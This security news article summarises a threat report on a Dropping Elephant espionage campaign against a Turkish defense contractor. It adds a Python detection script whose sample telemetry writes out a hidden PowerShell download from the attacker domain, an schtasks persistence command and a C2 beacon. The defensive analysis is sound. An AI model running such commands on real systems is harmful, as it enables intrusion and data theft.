Arctic Wolf Labs has uncovered a new cyber-espionage campaign orchestrated by the threat actor Dropping Elephant, targeting Türkiye’s defense industrial base—specifically a manufacturer of precision-guided missile systems. The operation leverages weaponized conference lures, DLL side-loading, and custom shellcode loaders to silently exfiltrate intelligence data, all under the guise of legitimate software and institutions.
The campaign coincides with intensified Türkiye-Pakistan defense collaboration and growing regional tensions with India, suggesting a geopolitically motivated operation. The primary victim is a prominent Turkish contractor involved in missile and hypersonic weapon development.
“This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan,” the report notes.
Suspected to be of Indian origin, Dropping Elephant has a history of cyber-espionage dating back to 2015. Their tactics blend social engineering, watering-hole attacks, and malicious apps to infiltrate targets. Previous malware includes VajraSpy and BADNEWS RAT.
“The group has since expanded its sights to include victims worldwide… particularly focusing on individuals, organizations, and sectors with diplomatic and economic ties to China,” the report states.
The attack begins with a seemingly benign conference invitation:
- Stage 1: LNK File Delivery
  - The file, named Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk, is a shortcut that launches PowerShell commands when opened.
- Stage 2: Distraction and Download
  - A fake PDF resembling a real conference flier from waset.org is shown to distract the victim while malware is silently fetched from the spoofed domain expouav[.]org.
- Stage 3: DLL Side-Loading via VLC Player
  - Dropping Elephant uses a legitimate vlc.exe and a renamed libvlc.dll to stealthily execute shellcode. Using trusted software like VLC plays on the user’s familiarity and bypasses basic security filters.
- Stage 4: Persistence and Execution
  - A scheduled task is created using a disguised Microsoft Task Scheduler binary (schtasks.exe) so that the malware persists across reboots. “The scheduled task executes a legitimate VLC Player file which runs a DLL. The DLL acts as a shellcode loader that decrypts the ciphertext shellcode stored in vlc.log,” the report notes.
- Stage 5: Payload Decryption and Execution
  - The final payload is a custom x86 Remote Access Trojan (RAT) that performs system reconnaissance, takes screenshots, collects metadata, and exfiltrates the results to the command-and-control server roseserve[.]org.
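The five stages above map onto a handful of endpoint telemetry events a defender can alert on: a PowerShell download pointing at the spoofed domain, a scheduled task whose action is vlc.exe, vlc.exe loading a DLL from outside its install directory, and vlc.exe beaconing to the C2 host. The script below is an added example written for this page, not code from Arctic Wolf Labs or the report; the Sysmon-style event dictionaries, the VLC install paths treated as trusted, the rule names and the sample events are all constructed assumptions. The two domains are the ones named in the article with the defanging brackets removed.

```python
"""Constructed detection heuristics for the Dropping Elephant kill chain
(LNK -> PowerShell download, scheduled task -> vlc.exe, side-loaded DLL,
C2 beacon). Events are constructed Sysmon-style dicts, not real telemetry."""
import re

# Domains taken from the report text, defanging removed for matching.
IOC_DOMAINS = {"expouav.org", "roseserve.org"}

# Assumed default VLC install locations; anything else is "untrusted" here.
TRUSTED_VLC_DIRS = (
    "c:\\program files\\videolan\\vlc\\",
    "c:\\program files (x86)\\videolan\\vlc\\",
)
# Where the genuine schtasks.exe lives; a copy elsewhere is the "disguised" binary.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
DOMAIN_RE = re.compile(r"([a-z0-9.-]+\.[a-z]{2,})", re.I)


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def in_trusted_vlc_dir(path: str) -> bool:
    return _norm(path).startswith(TRUSTED_VLC_DIRS)


def in_system_dir(path: str) -> bool:
    return _norm(path).startswith(SYSTEM_DIRS)


def ioc_domains_in(text: str) -> set:
    """Return the report IoC domains that appear anywhere in a command line."""
    return {d.lower() for d in DOMAIN_RE.findall(text) if d.lower() in IOC_DOMAINS}


def scan_events(events):
    """Run the four stage heuristics over a list of events; return findings."""
    findings = []
    for idx, ev in enumerate(events):
        kind = ev.get("type")
        image = ev.get("image", "")
        img = basename(image)
        cmd = ev.get("cmdline", "")
        if kind == "process_create" and img == "powershell.exe":
            # Stage 1-2: PowerShell spawned by the LNK fetching from the spoofed domain.
            if DOWNLOAD_RE.search(cmd) and ioc_domains_in(cmd):
                findings.append({"event": idx, "rule": "powershell_ioc_download"})
        elif kind == "process_create" and img == "schtasks.exe":
            # Stage 4: task creation running vlc.exe, or schtasks.exe copied out of System32.
            low = cmd.lower()
            if "/create" in low and ("vlc.exe" in low or not in_system_dir(image)):
                findings.append({"event": idx, "rule": "schtasks_vlc_persistence"})
        elif kind == "image_load" and img == "vlc.exe":
            # Stage 3: vlc.exe loading a DLL from a user-writable location (side-load).
            if not in_trusted_vlc_dir(ev.get("loaded", "")):
                findings.append({"event": idx, "rule": "vlc_untrusted_dll_load"})
        elif kind == "network_connect" and img == "vlc.exe":
            # Stage 5: the RAT, hosted by vlc.exe, talking to the C2 or running from %APPDATA%.
            host = ev.get("dest_host", "").lower()
            if host in IOC_DOMAINS or not in_trusted_vlc_dir(image):
                findings.append({"event": idx, "rule": "vlc_ioc_beacon"})
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
APPDATA_VLC = "C:\\Users\\user\\AppData\\Roaming\\vlc\\"

# Constructed sample telemetry: four malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": PS, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": 'powershell -w hidden -c "Invoke-WebRequest https://expouav.org/flier.pdf '
                '-OutFile $env:TEMP\\flier.pdf"'},
    {"type": "process_create", "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": PS,
     "cmdline": "schtasks /create /sc onlogon /tn Updater /tr " + APPDATA_VLC + "vlc.exe"},
    {"type": "image_load", "image": APPDATA_VLC + "vlc.exe", "loaded": APPDATA_VLC + "libvlc.dll"},
    {"type": "network_connect", "image": APPDATA_VLC + "vlc.exe", "dest_host": "roseserve.org"},
    {"type": "image_load", "image": "C:\\Program Files\\VideoLAN\\VLC\\vlc.exe",
     "loaded": "C:\\Program Files\\VideoLAN\\VLC\\libvlc.dll"},
    {"type": "process_create", "image": PS, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell Get-Date"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']}")
```

Each heuristic is deliberately narrow so that a legitimate VLC install loading its own libvlc.dll from Program Files, or an administrator running a harmless PowerShell one-liner, produces no finding; in production the trusted-directory list and the IoC set would come from configuration rather than constants.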
Once executed, the malware conducts deep reconnaissance on the host system:
- Takes screenshots and saves them as JPGs
- Captures system name, user name, and firmware info
- Detects sandbox environments to avoid analysis
The attackers have shown a deep understanding of Türkiye’s tech ecosystem by mimicking institutions such as:
- Pardus (a Turkish Linux distro) at roseserve[.]org
- Anadolu Agency, a major Turkish news outlet
“This choice demonstrates cultural and technical knowledge of the technology landscape in Türkiye, and the country’s technological independence.”
The custom payload includes commands like:
- 3Up3: Downloads and executes additional malware
- 3SC3: Captures screenshots
- 3gjdfghj6: Executes shell commands via cmd.exe
- 3APC3: Shellcode loader leveraging QueueUserAPC
These functions allow the threat actor to extend capabilities dynamically based on real-time reconnaissance.
Compared to previous Dropping Elephant campaigns, the new payload represents an evolution in stealth and performance:
“Diversification from x64 DLL to x86 PE architecture, with reduced library dependencies… command parsing in the new version is done with raw code, while the old version used the ‘C function’ – memcmp.”